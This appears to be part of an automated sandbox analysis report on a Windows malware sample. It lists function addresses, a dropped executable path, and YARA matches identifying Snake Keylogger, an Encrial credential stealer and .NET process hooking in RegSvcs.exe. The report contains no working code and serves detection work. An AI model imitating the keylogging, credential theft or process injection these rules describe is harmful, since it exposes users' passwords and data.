Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0090CAF0	0_2_0090CAF0
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0091CC39	0_2_0091CC39
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00936DD9	0_2_00936DD9
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009091C0	0_2_009091C0
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0091B119	0_2_0091B119
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00921394	0_2_00921394
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00921706	0_2_00921706
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0092781B	0_2_0092781B
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009219B0	0_2_009219B0
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00907920	0_2_00907920
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0091997D	0_2_0091997D
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00927A4A	0_2_00927A4A
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00927CA7	0_2_00927CA7
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00921C77	0_2_00921C77
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00939EEE	0_2_00939EEE
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0098BE44	0_2_0098BE44
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00921F32	0_2_00921F32
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_017F2138	0_2_017F2138
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F78060	2_2_00F78060
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE2046	2_2_00FE2046
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FD8298	2_2_00FD8298
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FAE4FF	2_2_00FAE4FF
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FA676B	2_2_00FA676B
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_01004873	2_2_01004873
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F7CAF0	2_2_00F7CAF0
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F9CAA0	2_2_00F9CAA0
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F8CC39	2_2_00F8CC39
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FA6DD9	2_2_00FA6DD9
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F791C0	2_2_00F791C0
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F8B119	2_2_00F8B119
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F91394	2_2_00F91394
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F91706	2_2_00F91706
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F9781B	2_2_00F9781B
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F919B0	2_2_00F919B0
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F8997D	2_2_00F8997D
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F77920	2_2_00F77920
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F97A4A	2_2_00F97A4A
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F97CA7	2_2_00F97CA7
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F91C77	2_2_00F91C77
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FA9EEE	2_2_00FA9EEE
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FFBE44	2_2_00FFBE44
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F91F32	2_2_00F91F32
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00BE56A8	2_2_00BE56A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03145362	3_2_03145362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314D278	3_2_0314D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314C19A	3_2_0314C19A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314C738	3_2_0314C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314C468	3_2_0314C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314CA08	3_2_0314CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314E988	3_2_0314E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_031469A0	3_2_031469A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314CFAA	3_2_0314CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03146FC8	3_2_03146FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03143E09	3_2_03143E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03149DE0	3_2_03149DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314CCD8	3_2_0314CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314F630	3_2_0314F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314FA88	3_2_0314FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03143AB1	3_2_03143AB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0314E97A	3_2_0314E97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_031429EC	3_2_031429EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D87D78	3_2_05D87D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D87720	3_2_05D87720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D88B58	3_2_05D88B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D865C0	3_2_05D865C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D815F8	3_2_05D815F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D815E9	3_2_05D815E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8C598	3_2_05D8C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8E588	3_2_05D8E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8C588	3_2_05D8C588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80D48	3_2_05D80D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8E578	3_2_05D8E578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80D38	3_2_05D80D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80498	3_2_05D80498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80488	3_2_05D80488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8FC58	3_2_05D8FC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8DC57	3_2_05D8DC57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8FC48	3_2_05D8FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8BC78	3_2_05D8BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8DC68	3_2_05D8DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D83460	3_2_05D83460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8BC67	3_2_05D8BC67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8D7D8	3_2_05D8D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8B7D9	3_2_05D8B7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8F7C8	3_2_05D8F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8D7C9	3_2_05D8D7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82FF8	3_2_05D82FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8B7E8	3_2_05D8B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D85780	3_2_05D85780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8F7B9	3_2_05D8F7B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82758	3_2_05D82758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82757	3_2_05D82757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82748	3_2_05D82748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8771F	3_2_05D8771F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D87711	3_2_05D87711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84ED0	3_2_05D84ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8AEC8	3_2_05D8AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84EC3	3_2_05D84EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D81E98	3_2_05D81E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8EE97	3_2_05D8EE97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8CEB8	3_2_05D8CEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8AEB7	3_2_05D8AEB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D81EA8	3_2_05D81EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8EEA8	3_2_05D8EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8CEA7	3_2_05D8CEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D86E70	3_2_05D86E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D86E60	3_2_05D86E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84610	3_2_05D84610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84620	3_2_05D84620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D841C8	3_2_05D841C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D81190	3_2_05D81190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D841B8	3_2_05D841B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D811A0	3_2_05D811A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8C108	3_2_05D8C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8A0D0	3_2_05D8A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8E0F8	3_2_05D8E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8C0F8	3_2_05D8C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D808F0	3_2_05D808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8E0E8	3_2_05D8E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8A0E0	3_2_05D8A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D808E1	3_2_05D808E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80040	3_2_05D80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D83008	3_2_05D83008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D80007	3_2_05D80007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D83007	3_2_05D83007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D86030	3_2_05D86030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D85BD8	3_2_05D85BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82BB0	3_2_05D82BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82BA1	3_2_05D82BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8B358	3_2_05D8B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8D348	3_2_05D8D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8B348	3_2_05D8B348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D88B49	3_2_05D88B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D85318	3_2_05D85318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D82300	3_2_05D82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8F338	3_2_05D8F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8D337	3_2_05D8D337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D85328	3_2_05D85328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8F328	3_2_05D8F328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D872C8	3_2_05D872C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D822F0	3_2_05D822F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D872B8	3_2_05D872B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D81A50	3_2_05D81A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D81A40	3_2_05D81A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84A78	3_2_05D84A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D84A68	3_2_05D84A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D86A18	3_2_05D86A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8EA18	3_2_05D8EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D86A1A	3_2_05D86A1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8CA17	3_2_05D8CA17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8EA07	3_2_05D8EA07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05D8CA28	3_2_05D8CA28
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 5_2_013873E8	5_2_013873E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00FA29E0	7_2_00FA29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00FA3E09	7_2_00FA3E09

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: String function: 00F8F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: String function: 00F79CB3 appears 31 times
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: String function: 00F90A30 appears 46 times
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: String function: 0091F9F2 appears 40 times
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: String function: 00909CB3 appears 31 times
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: String function: 00920A30 appears 46 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1492

Source: YJwE2gTm02.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
